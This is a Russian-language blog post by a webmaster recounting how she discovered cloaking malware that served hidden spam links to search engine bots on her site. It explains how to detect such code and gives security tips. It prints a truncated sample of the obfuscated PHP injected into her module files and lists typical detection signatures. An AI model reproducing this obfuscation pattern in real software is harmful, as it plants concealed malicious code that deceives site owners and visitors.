Что такое клоакинг, я знаю, но не думала, что мне придется с этим столкнуться. На днях обнаружилось на одном из моих сайтов огромное количество внешних ссылок (штук 100, а то и больше), причем, эти ссылки в исходном коде не просматривались. Проверила сайт на клоакинг  web-sniffer.net и в исходном коде увидела всю картину наглядно. Еще можно увидеть скрытые ссылки в google webmaster tools — “Fetch as Googlebot”. Это будет картина исходного кода, которую видит Google, поэтому сравните код, который видит user-agent Googlebot и код вашей страницы.

Происходит это примерно так: злоумышленники находят уязвимое место сайта, чтобы получить доступ к ftp. Следующим шагом будет загрузка на сайт файла (файл.php), в котором содержится вредоносный код или же просто дописывается вредоносный код в файлы, которые существуют. Обычные пользователи не видят ничего необычного на сайте, но при просмотре сайта поисковым роботом, выдается огромное количество спам-ссылок с ключевиками. У меня в конце страницы был список ссылок, причем все «буржуйские». Не буду вдаваться в подробности, потому что эта тема может растянуться не на один пост, скажу только, где я обнаружила скрытые ссылки — они находились в папке модулей. Везде читала, что самые уязвимые cms — это CMS Joomla, но зачем грешить только на нее, если на моем сайте установлена scripto. В каждом файле php в папке модулей был примерно такой код:

<?php
$md5 = «9bffa9c4fbe99488345714908c09b6bc»;
$wp_salt = array(‘r’,»6″,’s',’b',’)',»n»,»i»,’a',»_»,’;',»c»,’o',’v',»$»,»4″,»d»,»e»,’(‘,»g»,»f»,»t»,’l',’z');
$wp_add_filter = create_function(‘$’.'v’,$wp_salt[16]
……$wp_salt[7].$wp_salt[20].$wp_salt[16].$wp_salt[17].$wp_salt[3]
……..$wp_salt[4].$wp_salt[4].$wp_salt[9]); $wp_add_filter(‘FZjFrsRalgU/p
……………+UNWKFK9Pbnr/9Bi0vTQoSuCxm31z3p
…/Xroj5i7x6Uw/Mc6o8xNYyLstUB3
…/UnWRLWApexhqhUe4r8C4s4sQ+
…pDokBBTHVtVxzBSdwvAJaFkrSIAg61P/+57///e///D8=’);
?>

Весь код копировать не стану, потому что он на 10 тыс. символов. В остальных файлах был почти такой же код.
Вредоносный код со спам-ссылками для роботов не содержал функций “eval”, “base64_decode”, “json_decode” или “gzuncompress”, которые обычно должны быть в таком коде.

Найти вредоносный код со скрытыми ссылками — дело не такое уж и простое, потому что пришлось очень долго посидеть и просмотреть все файлы. Но найти все-таки можно.

Совет вебмастерам:

1. Почаще проверяйте сайт на клоакинг. В панели вебмастера в гугле также можно проверить сайт.

2. Периодически меняйте пароли к ftp, входа в админку, панели управления хостингом, базе данных.

3. Не сохраняйте пароли в браузерах, файловых менеджерах и ftp-клиентах.

4. Обновляйте CMS регулярно до последней версии.

Единственное, чего я не вычислила: каким образом сайт был взломан. Ведь на том хостинге и с одним и тем же доступом к ftp находятся еще очень много сайтов. Может сыграло роль то, что это был самый качественный сайт.

Вредоносный код, который в последнее время используется, чтобы выдавать роботам страницы со спам-ссылками, с большой вероятностью содержит функции “eval”, “base64_decode”, “json_decode” или “gzuncompress”, при этом использует переменные user_agent и referer. Но такой код постоянно эволюционирует, поэтому его признаки и принципы действия могут измениться в любой момент.

Не удивляйтесь, если в один прекрасный день со своего сайта вы узнаете, где купить будку для собаки. Но если у вас есть собака, то вам ссылка пригодиться, вдруг выберете для нее хорошую будку.